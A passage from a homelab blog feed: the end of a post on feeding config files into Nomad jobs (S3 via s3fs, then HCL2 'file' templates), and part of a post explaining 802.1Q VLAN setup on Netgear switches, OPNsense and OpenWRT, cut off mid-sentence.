</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>It makes use of the <a href="https://github.com/hashicorp/go-getter">go-getter</a> lib,
also by HashiCorp. It has a lot of different places which can be put into its
<code>source</code> option, including HTTP, Git and S3. What it cannot do, when used in
Nomad, is access random files on the Nomad host. This is obviously for security
reasons, but it is also very restricting.</p>
<p>So my only way to get config files into the service&rsquo;s containers was to provide
them through the <code>artifact</code> stanza.</p>
<p>Now, if I were a GitOps kind of guy, this would be simple. I could
use the artifact stanza to check out a Git repository with the service configs
and do the following when working on a service config change:</p>
<ol>
<li>Commit the potential change into the repo locally</li>
<li>Push the commit to my Gitea instance</li>
<li>Update the Nomad job on my machine with <code>nomad job run</code></li>
<li>See that the job fails due to an error in the config file</li>
<li>Make another change. Either create a new commit, probably called &ldquo;Attempt 1&rdquo;,
or do a force push</li>
<li>Launch the job again</li>
<li>See it fail again</li>
<li>Make another change. Either create a new commit, probably called &ldquo;Attempt 2&rdquo;,
or do a force push</li>
<li>&hellip;</li>
</ol>
<p>I hope you can see the problem already. If not, allow me to compliment your
patience.</p>
<p>But that&rsquo;s a relatively minor problem. The major problem with this approach:
Neither my Gitea instance nor its dependencies, Postgres and Redis, can now
run on the cluster. Because for Nomad to get Gitea&rsquo;s config file, it needs
to access the Gitea instance. Which is a problem.</p>
<p>So to spell out my goal: I wanted to be able to have a single Git repo somewhere,
with both the service configs and the Nomad job specs. And I wanted to be able to
make a change on disk and then, without committing or pushing or anything else,
I wanted to be able to run <code>nomad job run</code> and have the local state of files be
reflected in the newly started job.</p>
<p>I also wanted some way to not have to specify every single service config file
in the Nomad job spec. I wanted to be able to just say: Here is an entire
directory of configs, make them all available to the job.</p>
<p>So what I ended up doing was to acquire a goat. And an ancient dagger from a very
old friend. And then I went onto a misty hilltop and summoned the following
eldritch horror forth from the Warp.</p>
<h2 id="how-to-use-s3-as-a-filesystem">How to use S3 as a filesystem</h2>
<p>You have been warned.</p>
<p>From the Nomad side, I ended up using the <code>artifact</code> stanza with S3. I&rsquo;ve already
got S3 available via my Ceph cluster, and that Ceph cluster is considered to be
one layer below my Nomad cluster in the stack - meaning the Ceph cluster works
and bootstraps without needing anything from the Nomad cluster or any services
running on it.</p>
<p>So in my jobs, handling the service configs looked something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;foo&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;foo:1.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/artifact_dl/config&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/foo&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">artifact</span> {
</span></span><span style="display:flex;"><span>        source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;s3::https://example.com:4711/configs/foo/&#34;</span>
</span></span><span style="display:flex;"><span>        mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dir&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">options</span> {
</span></span><span style="display:flex;"><span>          region <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;homenet&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/templates/foobar.conf.templ&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/artifact_dl/config/foobar.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;644&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>This means that Nomad will download the <code>foo/</code> directory in the <code>configs/</code> bucket
and put its contents into <code>local/artifacts_dl/</code>. That directory would look like
this in my config git repository:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>config
</span></span><span style="display:flex;"><span>|- foo
</span></span><span style="display:flex;"><span>|  |- config/
</span></span><span style="display:flex;"><span>|  |  |- bar.conf
</span></span><span style="display:flex;"><span>|  |  |- baz.conf
</span></span><span style="display:flex;"><span>|  |- templates
</span></span><span style="display:flex;"><span>|  |  |- foobar.conf.template
</span></span><span style="display:flex;"><span>|  |- nomad
</span></span><span style="display:flex;"><span>|  |  |- foo.hcl
</span></span></code></pre></div><p>So I would have all my files for a particular job in a separate directory. And
only that subdirectory would be made available to the job during startup.</p>
<p>Now the last problem: How to get the automatic sync between my local working
copy and the S3 bucket? The answer is <a href="https://github.com/s3fs-fuse/s3fs-fuse">s3fs</a>.
A FUSE tool to mount S3 as a POSIX(ish) filesystem. So on my desktop, I would
run the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>s3fs -o passwd_file<span style="color:#f92672">=</span>/file/with/pw -o url<span style="color:#f92672">=</span>https://example.com:4711 -o use_path_request_style -o use_cache<span style="color:#f92672">=</span>/tmp/s3fs -o enable_noobj_cache -o multireq_max<span style="color:#f92672">=</span><span style="color:#ae81ff">500</span> -o parallel_count<span style="color:#f92672">=</span><span style="color:#ae81ff">50</span> configs /local/mount/path
</span></span></code></pre></div><p>And then I&rsquo;ve got the S3 bucket&rsquo;s content available locally. And you can even
work with Git on this S3 backed filesystem.</p>
<p>A short aside for other Ceph users. Ceph is able to provide an NFS filesystem
backed by an S3 bucket. This sounds like a way better solution, but it sadly
does not work. This S3 backed NFS provider does not support all FS operations,
it seems. Running <code>git status</code> on a Git repo on such a mounted NFS returns
&ldquo;not implemented&rdquo; errors.</p>
<p>When making local changes, I can then just run <code>nomad job run</code> and get the newly
started job to use the locally changed files - because they were synced back to
the S3 bucket.</p>
<p>There are a number of problems with this approach. First, performance. Normal FS
operations are okayish, but Git does a lot of FS operations. Even just a <code>git status</code>
takes a couple of seconds to complete, and the repo isn&rsquo;t that big. Even opening
files has a perceivable delay.
Then, note that I wrote above how I would get the changed config files in a
<em>newly started job</em>. Nomad only checks whether the job spec has changed when
determining whether it needs to update the job itself when running <code>nomad job run</code>.</p>
<p>You can work around that with the <code>nomad alloc stop</code> command. Interestingly, that
command doesn&rsquo;t really <em>stop</em> anything - it&rsquo;s more of a <code>stop and then start again</code>
operation. And that operation also downloads the artifacts again.</p>
<p>But hopefully, you can see that this is a clutch.</p>
<h2 id="doing-it-better">Doing it better</h2>
<p>To get rid of this entire setup, I changed my tool to make use of the <code>nomad</code>
binary to convert HCL job files to JSON files for use by the Nomad API.</p>
<p>This allows me to change the above Nomad file example into something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;foo&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;foo:1.0&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">mount</span> {
</span></span><span style="display:flex;"><span>          type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bind&#34;</span>
</span></span><span style="display:flex;"><span>          source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/artifact_dl/config&#34;</span>
</span></span><span style="display:flex;"><span>          target <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/etc/foo&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">dynamic</span> <span style="color:#e6db74">&#34;template&#34;</span> {
</span></span><span style="display:flex;"><span>        for_each <span style="color:#f92672">=</span> <span style="color:#66d9ef">fileset</span>(<span style="color:#e6db74">&#34;.&#34;, &#34;foo/config/*&#34;</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">content</span> {
</span></span><span style="display:flex;"><span>          data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#66d9ef">template</span>.<span style="color:#66d9ef">value</span>)
</span></span><span style="display:flex;"><span>          destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(template.value)}&#34;</span>
</span></span><span style="display:flex;"><span>          change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/templates/foobar.conf.templ&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;./local/config/foobar.conf&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;644&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>And there we are. The <code>dynamic</code> keyword is part of the HCL2 expansion of
HashiCorp&rsquo;s HCL language. It dynamically creates stanzas. In this case,
the above <code>dynamic</code> stanza is equivalent to:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>  data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/config/bar.conf&#34;</span>)
</span></span><span style="display:flex;"><span>  destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(/foo/config/bar.conf)}&#34;</span>
</span></span><span style="display:flex;"><span>  change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>  data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;foo/config/baz.conf&#34;</span>)
</span></span><span style="display:flex;"><span>  destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local/config/${basename(/foo/config/baz.conf)}&#34;</span>
</span></span><span style="display:flex;"><span>  change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The <code>fileset</code> just expands to a list of all the files according to the glob in
its argument, in this case to all files in <code>./foo/config</code>.</p>
<p>The <code>file</code> function just loads a file&rsquo;s content. In this case, that content
is loaded into the <code>data</code> parameter of template stanzas, which means inline
template definitions - just loaded from a file on the local disk, on the
operator machine, instead of the Nomad client filesystem during job startup.</p>
<p>Which is exactly what I needed. As I can now send the job spec and all service
config files off to Nomad for execution as one package. And because the config
files are now part of the job spec, from Nomad&rsquo;s PoV, the job is automatically
restarted whenever I update a config file.</p>
<p>There is one potential catch with this: I have read <em>somewhere</em>, a long while
ago, that there is a size limit to how large a transmitted job spec can be. I
can&rsquo;t find the bug report/documentation right now, but I seem to remember that
it was done to prevent Denial of Service attacks by sending overly large
job specs. My largest config currently is my Fluentd config, spread over a
number of files. It didn&rsquo;t result in any problem, so for now I seem to be safe.</p>
<p>My next steps:</p>
<ul>
<li>Migrating all of my jobs to use the new approach of using <code>file</code> for config
file management</li>
<li>Merging the services repository into my main homelab repo</li>
</ul>
<p>And the final step: Taking aforementioned ancient dagger and sending this
wandering S3 horror back whence it came.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Implementing VLANs in my Homelab: It&#39;s all fun and games until the trunk port arrives</title>
      <link>https://blog.mei-home.net/posts/vlans/</link>
      <pubDate>Tue, 10 Jan 2023 00:12:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/vlans/</guid>
      <description>Switching from a flat network to one segmented via VLANs using OPNsense and Netgear Smart Managed Switches</description>
      <content:encoded><![CDATA[<p>It took me quite a while to finally get VLANs. In fact, it took me until about
the middle of the migration to finally understand them. No idea why, as once I
did understand them, they make a lot of sense.</p>
<p>In this post, I will be going over my journey from a network with two subnets,
the DMZ and everything else, to a more segmented setup with multiple VLANs.</p>
<p>As the OS and switch HW used plays a significant role, here&rsquo;s my networking
equipment:</p>
<ol>
<li>I have two switches, both of them Netgear &ldquo;Smart Managed&rdquo; units. These are
Netgear&rsquo;s prosumer/SOHO units. They don&rsquo;t have as many options (and aren&rsquo;t
as expensive) as the fully managed enterprise offerings, but they also aren&rsquo;t
dump switches. Important for this topic is merely that both of them support
<em>802.1Q</em> type tagged VLANS. Specifically, I have these two:
<ul>
<li><a href="https://www.netgear.com/se/business/wired/switches/plus/gs108e/">GS108E</a></li>
<li><a href="https://www.netgear.com/se/business/wired/switches/plus/gs116ev2/">GS116Ev2</a></li>
</ul>
</li>
<li>My Firewall/Router is a 6-port, Intel mobile CPU unit: <a href="https://www.ipu-system.de/produkte/ipu672.html">this one</a>.
Sorry, the website seems to be in German only. It is running <a href="https://opnsense.org/">OPNsense</a>.</li>
<li>My WiFi AP is a <a href="https://www.tp-link.com/en/home-networking/wifi-router/archer-c7/">TP Link Archer C7</a>
running <a href="https://openwrt.org/">OpenWRT</a>.</li>
</ol>
<p>As I somehow took a while to wrap my head around VLANs and what their advantage
over subnetting is, I will not just keep this post to the &ldquo;Here is what I ended
up with&rdquo; style, but take you on the same journey I went on, including the things
which went wrong on the day of the switch.</p>
<p>I will be going into both, how VLANs work in principal, and how I applied them
with my particular hardware.</p>
<p>Enough intro, let&rsquo;s start out with what a VLAN is. &#x1f604;</p>
<h1 id="8021q-vlans">802.1Q VLANs</h1>
<p>There are several potential types of VLANs. The older kind is the <em>port based
VLAN</em>, which was rather vendor-specific. Then followed the <em>Tagged VLAN</em>, again
pretty vendor specific. These tagged VLANs later got standardized as <a href="https://en.wikipedia.org/wiki/IEEE_802.1Q">IEEE 802.1Q</a>.</p>
<p>For the rest of this post, I will <strong>only</strong> talk about 802.1Q VLANs.</p>
<p>I&rsquo;m going to keep the <em>theoretical</em> part pretty short here. Suffice it to say
that in tagged VLANs, each packet&rsquo;s header does not just carry the typical MAC
address and so forth, but also a VLAN ID, between 1 and 4096. This VLAN ID can
be interpreted by both, network equipment like switches and operating systems
on end user equipment. Both Linux and BSD support them in their networking stack.</p>
<p>And now on to what threw my understanding of VLANs: How are packets treated under
different scenarios? What happens when they enter a switch and leave it again?
What ports can they leave through? What about ports which connect switches with
each other?</p>
<p>Somehow, all the articles seemed to leave out something important. I&rsquo;m hoping
to prevent you from having to read two dozen articles before you get it - or
at least make this the last one you need. &#x1f609;</p>
<h2 id="switches">Switches</h2>
<p>In 802.1Q, a port has three important pieces of configuration attached to it:</p>
<ol>
<li>The VLANs (there can be multiple!) it is a member of</li>
<li>The port&rsquo;s tagged/untagged status per VLAN</li>
<li>The port&rsquo;s PVID, or default VLAN</li>
</ol>
<p>All three pieces of config play a part in deciding what happens to a packet
which either enters the switch through the port, or leaves it through it.</p>
<h3 id="entering-the-switch-through-a-port">Entering the switch through a port</h3>
<p>Here, the two configs &ldquo;member VLANs&rdquo; and &ldquo;PVID&rdquo; are relevant. The third config,
tagged/untagged, is <em>only</em> relevant when a packet leaves the switch through
that port.</p>
<p>In 802.1Q switches, the <em>PVID</em> denotes the default VLAN ID for packets which
enter through this port. This default VLAN ID is only applied if the entering
packet does not have any VLAN ID attached yet. There can only ever be one VLAN
default port ID per switch port (at least in more basic switches).</p>
<p>If the entering packet already has a VLAN ID, one of two things will happen:</p>
<ol>
<li>If the port through which the packet enters is a member of the VLAN which is
denoted in the VLAN ID of the packet, the packet is allowed to enter the
switch, and leave it again through any other port which is also a member of
that VLAN ID.</li>
<li>If the packet&rsquo;s VLAN ID does not fit any of the port&rsquo;s member VLANs,
the packet will simply be dropped.</li>
</ol>
<p>As a consequence of the above rules, the PVID of a port must match one of the
VLANs it is a member of.</p>
<p>So in short: If the entering packet is untagged, it will get the default VLAN
ID of the port it enters through. If it is tagged, it will be dropped if its
tag does not match any of the port&rsquo;s VLANs. Otherwise, it is allowed to enter
the switch.</p>
<h3 id="leaving-the-switch-through-a-port">Leaving the switch through a port</h3>
<p>So then on to what happens with a packet when it leaves the switch through a
port. First, for the packet to be able to leave the switch through a given port,
that port needs to be a member of the VLAN in the packet&rsquo;s VLAN header.
If that is the case, the tagged/untagged configuration comes into play. This is
the <em>only</em> time when this config plays a role. This config specifically doesn&rsquo;t
play any role at all for packets <em>entering</em> the switch through any given port.</p>
<p>When a packet leaves the switch through a <em>tagged</em> port, the packet&rsquo;s VLAN ID
is left untouched, and the packet will arrive at the other end of the network
cable still carrying the VLAN tag. This will confuse systems which don&rsquo;t know
about VLANs.</p>
<p>Note that a packet which leaves a switch always has a VLAN tag attached when
it arrives at the departure port, as a packet in a 802.1Q switch is never not
tagged.</p>
<p>If the port a packet leaves the switch through is <em>untagged</em>, the VLAN ID is
stripped out of the packet. This should be the default config for all ports,
unless the other end of the network cable is supposed to handle VLANs.</p>
<p>To reiterate: A packet leaving the switch can either be tagged or untagged,
depending on the config of the port it is leaving through.</p>
<h3 id="what-it-all-looks-like-on-netgear-smart-managed-plus-switches">What it all looks like on Netgear Smart Managed Plus switches</h3>
<p>Here are a couple of screenshot&rsquo;s from Netgear&rsquo;s web UI for configuring VLANs.</p>
<p>Here&rsquo;s the one to just switch VLANs on or off:</p>
<figure>
    <img loading="lazy" src="netgear_enable_vlans.png"
         alt="A website screenshot of the Netgear web UI. On the left side, there is a menu. The advanced -&gt; VLAN Configuration entry is highlighted. To the right, the heading reads Advanced 802.1Q VLAN configuration. Below it is a two-state radio button. The label reads Advanced 802.1Q VLAN. The two states read Disable and Enable. The Enable state is chosen in the screenshot."/> 
</figure>

<p>After the VLAN functionality has been enabled, VLANs can be added on the same page.
While the VLAN membership for each port is also shown, it can not be configured
on this page.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_identifier.png"
         alt="A screenshot of Netgears Web UI. It shows a heading reading VLAN Identifier Setting. On the right, there is a field with the label VLAN ID, with the value 100. Below is a table with three columns. The first one consists of checkboxes and does not have a header. The second one is headed VLAN ID. The only visible table row has the value 01. The next column has the header Port Members and the values 01 and 03 in the first row."/> 
</figure>

<p>In this screenshot, the input box in the upper right corner is the input for a
new VLAN, here with the VLAN ID &ldquo;100&rdquo;. The checkboxes in the first column are
for selecting a VLAN to be deleted.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_membership.png"
         alt="A screenshot of Netgears Web UI. On the left side, a menu is shown with the entry Advanced -&gt; VLAN Membership highlighted. On the right side, the heading reads VLAN Membership as well. Below it, a drop-down with the label VLAN ID has the value 100. Another drop-down, with the label Group Operation has no value. Below the drop-down, a stylized row of 16 Ethernet ports is shown, numbered one through 16. Port 1 has the letter U on it. So does Port 6. Port 12 has the letter T on it."/> 
</figure>

<p>The above screenshot shows the VLAN membership configuration. In the VLAN ID
drop-down, the VLAN ID to be configured can be chosen. Then, clicking on any of
the port icons will iterate through three values:</p>
<ol>
<li>None: All ports in the screenshot besides 1, 6, 12. This state means that the
port is not a member of VLAN 100. No packets with that VLAN can enter or
leave the switch through those ports.</li>
<li>U: This means the port is an untagged member. Ports 1 and 6 are examples. When
a packet leaves the switch through either of these ports, its VLAN tag will
be stripped out. If a packet with VLAN ID 100 enters through the port, it will
be forwarded normally.</li>
<li>T: This is a tagged port, with 12 being the only example in this screenshot.
Any packet with this VLAN ID entering the switch through port 12 will be
forwarded as normal. Any packet leaving the switch through the port will
retain its VLAN ID</li>
</ol>
<p>The untagged VLAN membership is generally advised for endpoints, while tagged
ports are normally used for uplinks to other switches or routers.</p>
<figure>
    <img loading="lazy" src="netgear_vlan_pvid.png"
         alt="A screenshot of Netgears Web UI. On the left, a menu is visible with the Advanced -&gt; Port PVID entry highlighted. On the right, the heading reads PVID Configuration. Below it is a table with three columns. The first one has no header and consists only of checkboxes. The checkbox in the first row is marked. The second column shows the heading Port and shows the value 1 in the first row. The last column has the header PVID and shows an entry field in an extra row below the heading. The value in that entry field is 86. The value in the first row is also 86."/> 
</figure>

<p>Finally, the above screen allows the configuration of the default port VLAN ID.
There can only ever be one default VLAN ID, which is assigned to all untagged
packets entering the port.</p>
<h2 id="opnsense">OPNsense</h2>
<p>Next part is my router/firewall, a 6-port unit running OPNsense, a FreeBSD based
OS.</p>
<p>On hosts, the configuration of VLANs works a little bit different. Both on Linux
and BSD, each VLAN becomes a new network device. The kernel then accepts all
packets from the NIC and hands the packet to the right device with a fitting
VLAN ID, or drops the packet if it doesn&rsquo;t fit anything.</p>
<p>In OPNsense, devices can be <em>stacked</em>, and the configuration for devices (like
firewall rules, DHCP configs etc) can be attached to virtual devices, with OPNsense
making sure that the right service instances listen to the right device.</p>
<p>The first step in creating a VLAN in OPNsense is under <em>Interfaces</em> -&gt; <em>Other Types</em>
-&gt; <em>VLAN</em>.</p>
<figure>
    <img loading="lazy" src="opnsense_vlan.png"
         alt="A screenshot of the OPNsense Web UI. On the left side, a menu is visible, with the entry Interfaces -&gt; Other Types -&gt; VLAN highlighted. On the right is a table. The first column has checkboxes, none of which are selected. There is only one row of data visible. In the second column headed Device, the value reads vlan01 [VLANGeneralLAN]. The third column has the heading Parent, with the value igb0 followed by a MAC address followed by [LAN]. The fourth column is headed Tag and has the value 86 in the first row. The next column is headed PCP with the value Best Effort (0,default). The next column has the heading Description with the value General VLAN on LAN interface. The last column, headed Commands, holds a couple of buttons."/> 
</figure>

<p>I&rsquo;ve cut out most of my VLANs. The one VLAN visible, with VLAN ID 86, is my general
VLAN for anything which only gets access to the internet and the DMZ and nothing else.</p>
<p>When adding a new VLAN here, a parent interface has to be defined. This parent
is the interface from which packets are forwarded to the VLAN interface by the
kernel. An interface can have multiple VLAN interfaces attached to it. This
even works with VLAN interfaces as parents, which is called <em>QinQ</em>.</p>
<p>These VLAN interfaces cannot be used directly in OPNsense, e.g. to create
firewall rules. Instead, an OPNsense interface based on them needs to be defined.</p>
<figure>
    <img loading="lazy" src="opnsense_interface_assignment.png"
         alt="A screenshot of the OPNsense Web UI. On the left, a menu with the entry Interface -&gt; Assignments being highlighted is visible. On the right, a drop-down besides the Label VLANGeneralLAN is visible, with the entry vlan01 GeneralVLAN on LAN interface (Parent:igb0, Tag:86) is shown."/> 
</figure>

<p>On this screen, an interface is assigned to a device. Interfaces are the entities
to which configs can be assigned, e.g. as listening interfaces for DNS servers,
as containers for firewall rules etc.</p>
<p>Once the assignment is done here, the interface needs to be further configured.
Most importantly, it needs to receive an IP if the firewall is supposed to be
reachable from that interface/VLAN.</p>
<figure>
    <img loading="lazy" src="opnsense_interface_conf.png"
         alt="Another screenshot of the OPNsense Web UI. On the left, the menu item Interfaces -&gt; VLANGeneralLAN is selected. On the right, the config option Static IPv4 is chosen in the field labeled IPv4 Configuration Type. The field IPv4 address has the value 10.86.86.254."/> 
</figure>

<p>In my configuration, each of the VLAN gets the subnet corresponding to the VLAN ID
as the third byte, so in the case of my VLAN 86, the subnet is <code>10.86.86.0/24</code>.</p>
<p>With that, OPNsense is fully configured to receive packets on <code>igb0</code>, which is
the device configured as the parent of VLAN 86. The rest of the configuration
is the same as for other types of interfaces. DHCP, DNS, firewall rules etc. can
be setup now.</p>
<h2 id="openwrt">OpenWRT</h2>
<p>The final explainer will be on OpenWRT, which I&rsquo;m using as the OS for my WiFi
AP. Here, we&rsquo;ve got the interesting case of a device which combines both of the
previous VLAN config approaches: It contains a 4-port Ethernet switch, but also
gets VLAN devices via the kernel.</p>
<p>In the default configuration, OpenWRT already has VLANs enabled, with different
VLAN IPs for the LAN and WAN zones.</p>
<p>The OpenWRT VLAN config can be found in the <em>Network</em> -&gt; <em>Switch</em> menu.</p>
<figure>
    <img loading="lazy" src="openwrt_switch.png"
         alt="A screenshot of the OpenWRT Web UI. Under the heading VLANs on switch0, there are six ports displayed. The first one is called CPU(eth0), followed by LAN 1 through LAN 4. The final port is headed WAN. In a table below it are three VLANs with IDs 1,2 and 86. The CPU port has the value tagged on all of the VLANs. Port LAN 1 has value untagged on VLAN 1, off on VLAN 2 and tagged on VLAN 86. The other ports are not important here."/> 
</figure>

<p>One important and initially confusing point is the <code>CPU(eth0)</code> port here. This
port represents the connection to the AP&rsquo;s CPU, which simply means that all
packets arriving here are handed to OpenWRT&rsquo;s Linux kernel and the configured
VLAN devices. You can imagine that the AP is really a 6-port switch, with the
AP&rsquo;s controller plugged into the first port.</p>
<p>As per the configuration shown above, all of my VLANs are forwarded tagged into
the kernel. This means that there need to be NIC devices configured to accept
those packages in the kernel. I will get to those in a moment.</p>
<p>Only the LAN 1 port is connected in my setup. The WiFis are not considered here,
I will get to them in a bit. The port 1 forwards VLAN 1 untagged. This is my
admin VLAN. I left it untagged during the configuration to avoid losing access
to the AP if I misconfigure something. VLAN 2 is completely unused here. It is
part of the default setup, used by WAN traffic if OpenWRT is also used as a
router. As I&rsquo;m only using it as WiFi AP, it doesn&rsquo;t play any role here.
VLAN 86, which is my general VLAN with access to very little, is forwarded tagged,
so that at my upstream switch, it can only go to my firewall, where it can then
only be routed to my DMZ or the internet.</p>
<p>The next step in configuring VLAN use for the WiFis is to create a VLAN device
for VLAN 86, very similar to the first step in configuring the VLAN on the
OPNsense firewall.
To do so, go to <em>Network</em> -&gt; <em>Interfaces</em> -&gt; <em>Devices</em> and click on the
<em>Add device configuration</em> button.</p>
<figure>
    <img loading="lazy" src="openwrt_vlan_device.png"
         alt="A screenshot of the OpenWRT device creation form. In the Device type field, VLAN (802.1Q) is set. Base device is set to eth0 and VLAN ID is set to 12, with Device name set to eth0.12."/> 
</figure>

<p>The device type is an 802.1Q device again. The base device is eth0, which as
previously mentioned is the CPU side, internal port on the AP. The VLAN ID is
&ldquo;12&rdquo;, just for illustrative purposes. The <em>Device name</em> field is filled out
automatically when the VLAN ID is entered.</p>
<p>To connect WiFis to the VLAN, we now need to create a bridge device, which
contains both the new VLAN device and the two WiFis (I&rsquo;ve got a 2.4 GHz and a 5 GHz one).</p>
<p>This is done with the same button, only this time choosing <em>Bridge device</em> as
the type.</p>
<figure>
    <img loading="lazy" src="openwrt_bridge_device.png"
         alt="Another screenshot of the OpenWRT device creation form. The chosen Device type is now Bridge device. The device name is eth0.12 with the Bridge ports setting being eth0.86. All other fields are unset."/> 
</figure>

<p>The important config here is <em>Bridge ports</em>. This config determines which devices
are connected to this bridge. Choosing <em>eth0.86</em> here means that the VLAN device
for VLAN 86 will be part of the bridge.
The WiFis cannot be added to the bridge here.</p>
<p>The next step is creating an interface for the bridge, under <em>Network</em> -&gt; <em>Interfaces</em>.
Clicking on <em>Add new interface</em>, you can add new devices.</p>
<figure>
    <img loading="lazy" src="openwrt_bridge_interface.png"
         alt="The OpenWRT device addition entry mask. In the Name field, WIFILAN2 has been set. The Protocol field is set to Unmanaged, while the Device field is set to br-wifi."/> 
</figure>

<p>This is only a demonstration for adding a new device. I have set the <em>Protocol</em>
field to &ldquo;Unmanaged&rdquo; because I don&rsquo;t actually need this interface to have an IP
address and so on. The bridge is used purely for forwarding packets from the WiFis
to the rest of the network. The chosen device is the bridge created previously.</p>
<p>The final step is setting up the WiFis so they use the newly created interface.
This can be done in the <em>Network</em> -&gt; <em>Wireless</em> menu.</p>
<figure>
    <img loading="lazy" src="openwrt_wifi.png"
         alt="A cropped screenshot showing the Network field set to wifilan."/> 
</figure>

<p>Clicking on <em>Edit</em> on one of the WiFi networks, you can choose an interface in
the drop-down of the <em>Network</em> option. Choosing the previously created interface
containing the bridge with the VLAN device will connect the WiFi network to the
VLAN. With that, all packets coming from the WiFi will be tagged with the VLAN
